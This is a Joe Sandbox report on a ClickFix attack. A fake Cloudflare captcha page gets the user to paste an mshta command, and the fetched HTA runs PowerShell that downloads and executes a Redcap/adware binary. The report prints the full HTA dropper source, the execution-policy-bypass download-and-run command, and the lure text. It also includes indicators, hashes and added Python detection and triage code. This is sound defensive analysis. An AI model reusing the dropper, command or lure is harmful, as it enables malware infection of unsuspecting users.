        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: edputil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.staterepositoryps.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecoreuapcommonproxystub.dll
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
        Source: C:\ProgramData\Captcha.exe | Section loaded: cryptbase.dll
        Source: C:\ProgramData\Captcha.exe | Section loaded: winmm.dll
        Source: C:\ProgramData\Captcha.exe | Section loaded: powrprof.dll
        Source: C:\ProgramData\Captcha.exe | Section loaded: umpdc.dll
        Source: C:\Windows\System32\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32
        Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
        Source: Window Recorder | Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

        Data Obfuscation

        Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"
        Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'"

        Persistence and Installation Behavior

        Source: Chrome DOM: 1.3 | OCR Text: cloudflare.com Verify seconds. Complete these Verification steps To better prove you are not a rabat, please: 1. Press & hold the Windows Key + R 2. In the verification window, press Ctrl + V 3. Press Enter on the keyboard to finish cloud of your connection before proceeding. Yau fully agree: I am not a robot - Cloudflare Verification 10: 89ad7f Perform the steps above to finish verification VERIFY Ray ID: cceSZ1hbaddc6Z Performance & security by Cloudflare Cloudflare
        Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Clipboard modification: mshta https://anaamw.com/p3.php
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\Captcha.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\ProgramData\Captcha.exe
        Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (96 consecutive identical entries)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\ProgramData\Captcha.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\ProgramData\Captcha.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (4 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1982
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1193
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8687
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848 | Thread sleep count: 1982 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848 | Thread sleep count: 45 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2848 | Thread sleep count: 1193 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6944 | Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7320 | Thread sleep time: -1844674407370954s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5752 | Thread sleep count: 8687 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep Bypass -nop -c "Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\ProgramData\Captcha.exe; Start-Process 'C:\ProgramData\Captcha.exe'" (2 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\ProgramData\Captcha.exe "C:\ProgramData\Captcha.exe"
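The two "Process created" entries above are the whole ClickFix execution chain: mshta.exe (launched with the pasted clipboard text, visible in the omnibox query later in this report as "mshta https://anaamw.com/p3.php") spawns powershell.exe with the execution policy bypassed, which downloads Folder.exe into C:\ProgramData as Captcha.exe and starts it. Note that the submitted sample URL was on anaamw.om, which never resolved in the domain table below; every fetch that mattered went to anaamw.com. The following detection is an added example written for this page, not part of the Joe Sandbox report or its signature set. It replays that chain logic over process-creation events in Python; the Sysmon-style field names, the sample events and every PID except chrome's 6580 are assumptions constructed to mirror the report's process tree.

```python
"""Detect the mshta -> powershell -> dropped-EXE chain from this report.

Added example, not part of the Joe Sandbox report. It runs over constructed
process-creation events (Sysmon Event ID 1 style records, fields assumed) and
reproduces the report's signature logic: an mshta.exe parent spawning
powershell.exe with an execution-policy bypass and a web download into
C:\\ProgramData, which is then started from the same PowerShell process.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (field names are assumptions)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Each pattern mirrors one element of the observed command line.
EXEC_POLICY_BYPASS = re.compile(r"(?i)-(?:ep|ex\w*)\s+(?:bypass|unrestricted)")
WEB_DOWNLOAD = re.compile(r"(?i)\b(?:invoke-webrequest|iwr|curl|wget|downloadfile|downloadstring)\b")
OUTFILE_PROGRAMDATA = re.compile(r'''(?i)-outfile\s+['"]?(c:\\programdata\\[^\s'";]+)''')
START_PROCESS = re.compile(r"(?i)\bstart-process\b")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def find_clickfix_chains(events):
    """Return (mshta_pid, powershell_pid, dropped_path) for every chain found.

    A chain is: mshta.exe parent -> powershell.exe child whose command line
    bypasses the execution policy, downloads a file into C:\\ProgramData and
    either calls Start-Process on it or is seen spawning it.
    """
    by_pid = {e.pid: e for e in events}
    children = {}
    for e in events:
        children.setdefault(e.ppid, []).append(e)

    hits = []
    for ps in events:
        if basename(ps.image) != "powershell.exe":
            continue
        parent = by_pid.get(ps.ppid)
        if parent is None or basename(parent.image) != "mshta.exe":
            continue
        cmd = ps.cmdline
        if not (EXEC_POLICY_BYPASS.search(cmd) and WEB_DOWNLOAD.search(cmd)):
            continue
        m = OUTFILE_PROGRAMDATA.search(cmd)
        if not m:
            continue
        dropped = m.group(1).lower()
        # Strongest signal: the PowerShell process launches the file it just wrote.
        spawned = any(c.image.lower() == dropped for c in children.get(ps.pid, []))
        if spawned or START_PROCESS.search(cmd):
            hits.append((parent.pid, ps.pid, dropped))
    return hits


# Constructed events mirroring the report's tree; PIDs other than 6580 are made up.
SAMPLE_EVENTS = [
    ProcEvent(6580, 1000, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              '"C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe" --start-maximized "about:blank"'),
    ProcEvent(4100, 1000, r"C:\Windows\System32\mshta.exe",
              "mshta https://anaamw.com/p3.php"),
    ProcEvent(4312, 4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -ep Bypass -nop -c '
              '"Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\\ProgramData\\Captcha.exe; '
              "Start-Process 'C:\\ProgramData\\Captcha.exe'\""),
    ProcEvent(5200, 4312, r"C:\ProgramData\Captcha.exe", '"C:\\ProgramData\\Captcha.exe"'),
    # Benign control: an interactive download with no mshta parent must not match.
    ProcEvent(7000, 1000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell -c "Invoke-WebRequest https://example.invalid/tool.zip -OutFile C:\\Temp\\tool.zip"'),
]

if __name__ == "__main__":
    for mshta_pid, ps_pid, dropped in find_clickfix_chains(SAMPLE_EVENTS):
        print(f"ClickFix chain: mshta {mshta_pid} -> powershell {ps_pid} -> {dropped}")
```

The parent check is what keeps the rule quiet on admins who download tooling from an interactive shell; the Start-Process fallback covers the case where the child process event is missing, as it would be when, as here, the sandbox or EDR truncates the tree.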
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation (7 occurrences)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
MITRE ATT&CK matrix, one tactic per line. Counts in parentheses are the number of report signatures mapped to that technique; entries without a count are unmatched matrix rows.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: PowerShell (3); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: Browser Extensions (3); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (11); DLL Side-Loading (1); Extra Window Memory Injection (1); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Masquerading (11); Virtualization/Sandbox Evasion (21); Process Injection (11); DLL Side-Loading (1); File Deletion (1); Extra Window Memory Injection (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Email Collection (1); Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (1); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Source | Detection | Scanner | Label
https://anaamw.om/p3.php/1 | 0% | Avira URL Cloud | safe
Source | Detection | Scanner | Label
C:\ProgramData\Captcha.exe | 100% | Avira | TR/Redcap.ivwok
C:\ProgramData\Captcha.exe | 38% | ReversingLabs | Win32.Adware.RedCap
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
https://anaamw.com/p3.php/1?js | 100% | Avira URL Cloud | malware
https://anaamw.com/favicon.ico | 100% | Avira URL Cloud | malware
https://portal.azure.com/apc/trans.gif?a38ce52767fa2b26b2add34685ee7810 | 0% | Avira URL Cloud | safe
https://anaamw.com/p3.php | 100% | Avira URL Cloud | malware
https://anaamw.com/Folder.exe | 100% | Avira URL Cloud | malware
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mshta+https%3A%2F%2Fanaamw.com%2Fp3.php&oit=4&cp=31&pgcl=7&gs_rn=42&psi=gTcE_khvmMX2SDHf&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE | 0% | Avira URL Cloud | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
google.com | 142.250.64.78 | true | false | | high
ogads-pa.clients6.google.com | 142.250.80.42 | true | false | | high
plus.l.google.com | 142.250.80.14 | true | false | | high
play.google.com | 142.250.80.78 | true | false | | high
anaamw.com | 66.96.147.114 | true | false | | high
www.google.com | 142.251.41.4 | true | false | | high
anaamw.om | unknown | unknown | false | | high
apis.google.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
https://www.google.com/async/ddljson?async=ntp:2 | false | | high
https://anaamw.com/Folder.exe | true | Avira URL Cloud: malware | unknown
https://anaamw.com/p3.php | true | Avira URL Cloud: malware | unknown
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=mshta+https%3A%2F%2Fanaamw.com%2Fp3.php&oit=4&cp=31&pgcl=7&gs_rn=42&psi=gTcE_khvmMX2SDHf&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE | false | Avira URL Cloud: safe | unknown
https://anaamw.com/p3.php/1?js | true | Avira URL Cloud: malware | unknown
https://portal.azure.com/apc/trans.gif?a38ce52767fa2b26b2add34685ee7810 | false | Avira URL Cloud: safe | unknown
https://anaamw.com/favicon.ico | true | Avira URL Cloud: malware | unknown
https://anaamw.com/p3.php/1 | true | | unknown
https://www.google.com/async/newtab_promos | false | | high
https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.24R2mrw_td8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9vR1rNwOjC3PXOxUlyKiCwNBv2Fg/cb=gapi.loaded_0 | false | | high
https://www.google.com/async/newtab_ogb?hl=en-US&async=fixed:0 | false | | high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE | false | | high
https://ogads-pa.clients6.google.com/$rpc/google.internal.onegoogle.asyncdata.v1.AsyncDataService/GetAsyncData | false | | high
https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyA2KlwBX3mkFo30om9LUFYQhpqLoa_BNhE | false | | high
IP | Domain | Country | ASN | ASN Name | Malicious
142.250.80.14 | plus.l.google.com | United States | 15169 | GOOGLEUS | false
1.1.1.1 | unknown | Australia | 13335 | CLOUDFLARENETUS | false
142.250.65.174 | unknown | United States | 15169 | GOOGLEUS | false
142.250.65.163 | unknown | United States | 15169 | GOOGLEUS | false
142.250.80.110 | unknown | United States | 15169 | GOOGLEUS | false
66.96.147.114 | anaamw.com | United States | 29873 | BIZLAND-SDUS | false
142.250.80.42 | ogads-pa.clients6.google.com | United States | 15169 | GOOGLEUS | false
142.250.80.99 | unknown | United States | 15169 | GOOGLEUS | false
8.8.8.8 | unknown | United States | 15169 | GOOGLEUS | false
142.251.40.142 | unknown | United States | 15169 | GOOGLEUS | false
142.251.40.163 | unknown | United States | 15169 | GOOGLEUS | false
142.251.41.4 | www.google.com | United States | 15169 | GOOGLEUS | false
142.250.31.84 | unknown | United States | 15169 | GOOGLEUS | false
IP (private addresses, no domain or ASN data): 192.168.2.18, 192.168.2.4, 192.168.2.24
                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1654830
                                        Start date and time:2025-04-02 16:56:57 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                        Sample URL:https://anaamw.om/p3.php/1
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:21
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • EGA enabled
                                        Analysis Mode:stream
                                        Analysis stop reason:Timeout
                                        Detection:MAL
                                        Classification:mal100.phis.evad.win@37/15@33/115
                                        • Exclude process from analysis (whitelisted): SgrmBroker.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 184.31.69.3, 142.250.65.163, 142.250.65.174, 142.250.80.110, 142.250.31.84, 142.251.35.174, 172.217.165.142, 142.251.40.238
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, clientservices.googleapis.com, clients.l.google.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e16604.dscf.akamaiedge.net
• Not all processes were analyzed; the report is missing behavior information
                                        • Report size getting too big, too many NtOpenFile calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • VT rate limit hit for: https://anaamw.om/p3.php/1
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                        Category:dropped
                                        Size (bytes):1925664
                                        Entropy (8bit):6.682528936136967
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:CBB05282E7039F0CCFBC1FBB455F14CB
                                        SHA1:CD06736FF9947E772DC42ABF9021B23FAF0ADF82
                                        SHA-256:95295068E3737CA1F0DFF1678E8D998ECF69FF150BD8DED6B7097230E1D3CE40
                                        SHA-512:4BA10ABA0A589C11C22D6306FDC01C183AF90BC277E9E076C4FB64B5A752CCDAAB07451DF89F31E1D863260139CF16240711874AE75341198A7614490773D265
                                        Malicious:true
                                        Antivirus:
                                        • Antivirus: Avira, Detection: 100%
                                        • Antivirus: ReversingLabs, Detection: 38%
                                        Reputation:unknown
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........................6...@....................@..........................`......Jy....@..................................0.......0...%.............. r...@...................................................... ................................text....4.......6..................`..`.rdata..,....P.......:..............@..@.data....4..........................@....idata.......0......................@....reloc.......@......................@..B.symtab...... .........................B.rsrc....%...0...&..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Windows\System32\mshta.exe
                                        File Type:HTML document, ASCII text, with very long lines (684), with no line terminators
                                        Category:dropped
                                        Size (bytes):684
                                        Entropy (8bit):5.520581683346053
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:7DC5D123060C1C040B62E5833B9DF426
                                        SHA1:E0D1EC498DA1C3056A997FB05C8C60F3D6E43143
                                        SHA-256:D05A6CB855D87CD7841CB4A34074E23484F6B2FF8756835AABC153980EE0323F
                                        SHA-512:2E66FFD65F631C3F4251EBAB353032778E6BF3F86CD6751127D3322374A58C243F7DD9CD096F44FD33A1D1E6ED90D3FE14CC42B14880BCCCA35E83C467FBB1FC
                                        Malicious:false
                                        Reputation:unknown
                                        Preview:<!DOCTYPE html><html><head><HTA:APPLICATION ID="CS" APPLICATIONNAME="Captcha" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"><script>new ActiveXObject("Wscript.Shell").Run("powershell -ep Bypass -nop -c \"Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\\ProgramData\\Captcha.exe; Start-Process 'C:\\ProgramData\\Captcha.exe'\"",0);var filename = window.location.href;filename = decodeURI(filename);filename = filename.replace("file:///", "");var fso = new ActiveXObject("Scripting.FileSystemObject");if(fso.FileExists(filename)){try{fso.DeleteFile(filename,true)}catch(e){}}window.close()</script></head><body></body></html>
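The 684-byte HTML document above is the HTA that mshta.exe fetched from anaamw.com/p3.php and that produced the PowerShell process in the evasion section: it declares a window that is minimized, has no caption and no taskbar entry, runs the PowerShell command through WScript.Shell with window style 0, then resolves its own path from window.location.href and deletes it. The triage script below is an added example written for this page, not part of the Joe Sandbox report or its tooling. It extracts those facts statically in Python without executing the HTA; HTA_SAMPLE is a constructed copy of the preview text, and all function names are the example's own.

```python
"""Static triage of the dropper HTA shown in the preview above.

Added example, not part of the Joe Sandbox report or its tooling. It pulls the
security-relevant facts out of the HTA without executing it: the hidden-window
HTA:APPLICATION attributes, the command handed to WScript.Shell.Run (with its
JavaScript string escaping undone) and the window style, the download URL and
-OutFile target inside that command, and the self-delete via
window.location.href. HTA_SAMPLE is a constructed copy of the report preview.
"""
import json
import re

HTA_SAMPLE = r'''<!DOCTYPE html><html><head><HTA:APPLICATION ID="CS" APPLICATIONNAME="Captcha" WINDOWSTATE="minimize" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" CAPTION="no" SHOWINTASKBAR="no"><script>new ActiveXObject("Wscript.Shell").Run("powershell -ep Bypass -nop -c \"Invoke-WebRequest https://anaamw.com/Folder.exe -OutFile C:\\ProgramData\\Captcha.exe; Start-Process 'C:\\ProgramData\\Captcha.exe'\"",0);var filename = window.location.href;filename = decodeURI(filename);filename = filename.replace("file:///", "");var fso = new ActiveXObject("Scripting.FileSystemObject");if(fso.FileExists(filename)){try{fso.DeleteFile(filename,true)}catch(e){}}window.close()</script></head><body></body></html>'''

HTA_APP_TAG = re.compile(r"<HTA:APPLICATION\b([^>]*)>", re.I)
ATTR = re.compile(r'(\w+)="([^"]*)"')
# WScript.Shell.Run("<JavaScript string literal>", <window style>)
RUN_CALL = re.compile(r'\.Run\(\s*"((?:[^"\\]|\\.)*)"\s*,\s*(\d+)\s*\)')
URL_RE = re.compile(r'''https?://[^\s"'<>]+''')
OUTFILE_RE = re.compile(r'''(?i)-outfile\s+['"]?([^\s'";]+)''')


def js_unescape(literal_body: str) -> str:
    """Undo the escaping of a JavaScript double-quoted string literal.

    Only backslash-quote and double-backslash occur here, and both are valid
    JSON escapes, so the JSON decoder does the job without a custom parser.
    """
    return json.loads('"' + literal_body + '"')


def hta_application_attrs(hta: str) -> dict:
    """Attributes of the <HTA:APPLICATION> tag, keys upper-cased."""
    m = HTA_APP_TAG.search(hta)
    return {k.upper(): v for k, v in ATTR.findall(m.group(1))} if m else {}


def triage_hta(hta: str) -> dict:
    """Extract the indicators a responder needs from the HTA source."""
    attrs = hta_application_attrs(hta)
    run = RUN_CALL.search(hta)
    command = js_unescape(run.group(1)) if run else ""
    outfile = OUTFILE_RE.search(command)
    return {
        "app_attrs": attrs,
        # minimized plus no taskbar entry: the HTA never shows a visible window
        "hidden_window": attrs.get("WINDOWSTATE", "").lower() == "minimize"
                         and attrs.get("SHOWINTASKBAR", "").lower() == "no",
        "command": command,
        "run_window_style": int(run.group(2)) if run else None,  # 0 hides the child window
        "urls": URL_RE.findall(command),
        "outfile": outfile.group(1) if outfile else None,
        # the script resolves its own path from window.location.href and deletes it
        "self_deletes": "window.location.href" in hta and "DeleteFile(" in hta,
    }


if __name__ == "__main__":
    for key, value in triage_hta(HTA_SAMPLE).items():
        print(f"{key}: {value}")
```

Running the decoder rather than eyeballing the preview matters for the escaping: the literal `\"` and `\\` sequences in the HTA are JavaScript escapes, and the command PowerShell actually receives is the unescaped one, which is what should be compared against the process-creation entries earlier in the report.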
                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):16000
                                        Entropy (8bit):5.481547571910865
                                        Encrypted:false
                                        SSDEEP:
                                        MD5:31019EC1D7D594B8CFA259CA5092AEB4
                                        SHA1:64365CDA475E117A63188E0203D23B88A607DF7B
                                        SHA-256:4AD05942C2BF8F5B417D74DB404020C790762F6056C4F1165BA7F2CECBF3E1DD
                                        SHA-512:B50B40D121DD13AC796848B7B1197D6876EF1BC1E612ADBE7849BCD5647C97ACCC2709A400EF85709FC41D8D58B2555DA6C335A695FE78C625FBFC7425B4633F
                                        Malicious:false
                                        Reputation:unknown
